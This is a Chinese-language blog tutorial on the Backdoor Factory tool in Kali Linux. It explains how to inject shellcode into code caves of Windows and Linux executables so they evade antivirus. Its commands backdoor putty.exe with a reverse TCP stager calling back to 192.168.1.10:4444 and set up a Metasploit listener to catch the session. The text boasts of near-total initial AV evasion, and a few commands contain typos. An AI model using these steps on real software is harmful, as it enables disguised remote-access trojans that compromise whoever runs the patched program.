kali linux之Backdoor-factory

Backdoor-------python编写

适用于windows PE x32/x64 和Linux ELF x32/x64（OSX），支持msf payload 自定义payload

将shellcode代码patch进行模板文件，躲避AV检查

 

Patch：

通过替换exe，dll，注册表等方法修复系统漏洞或问题的方法

BDF：向二进制文件中增加或删除代码内容，某些受保护的二进制程序无法patch，存在一定概率文件会被patch坏掉

 

CTP方法--------增加新的代码段section，与msf的-k方法类似，使用现有的代码裂缝（code cave）存放shellcode

代码裂缝-------二进制文件中超过两个字节的连续x00区域（代码片段间区域），根据统计判断代码缝隙是编译器在进行编译时造成的，不同的编译器造成的代码缝隙大小不同

 

hexeditor查看某程序的代码裂缝

 

 

单个代码洞大小不足以存放完整的shellcode，多个代码洞跳转--非顺序执行（初期免杀率可达100%），结合msf的stager方法

 

patch选项----附加代码段，单代码注入，多代码注入

 

常用参数：

-f  指定某程序注入payload

-S 检查当前文件是否支持注入后门

-s  可以使用的有效负载，使用“show”来查看有效载荷

-H 接受反弹会话的ip主机

 

-c  代码裂缝，确定支持patch 后，查看其是否支持指定的 shellcode patch

-l   代码裂缝大小

-J  使用多代码缝隙跳转的方式

-a  使用add-new-section添加代码段

 

 

backdoor-factory -f putty.exe -S（查看是否支持注入后门）

backdoor-factory -f putty.exe -s show（查看支持的有效负载有哪些）

backdoor-factory -f putty.exe -s show iat_reverse_tcp_stager_threaded -H 192.168.1.10 -P 4444（使用iat_reverse_tcp_stager_threaded负载）

 

使用 msf 侦听

set payload windows/meterpreter/revers_tcp set LHOST 192.168.1.10 set LPORT 4444 exploit

 

 

backdoor-factory -f putty.exe -s show iat_reverse_tcp_stager_threaded -H 192.168.1.10 -P 4444 -J（使用多代码缝隙跳转的方式）

 

backdoor-factory -f putty.exe -s show iat_reverse_tcp_stager_threaded -H 192.168.1.10 -P 4444 -a（使用add-new-section添加代码段）

 

 

 

使用 msf 侦听

set payload windows/meterpreter/revers_tcp set LHOST 192.168.1.10 set LPORT 4444 exploit

 

 

 

 

友情链接 http://www.cnblogs.com/klionsec

               http://www.cnblogs.com/l0cm

               http://www.cnblogs.com/Anonyaptxxx

               http://www.feiyusafe.cn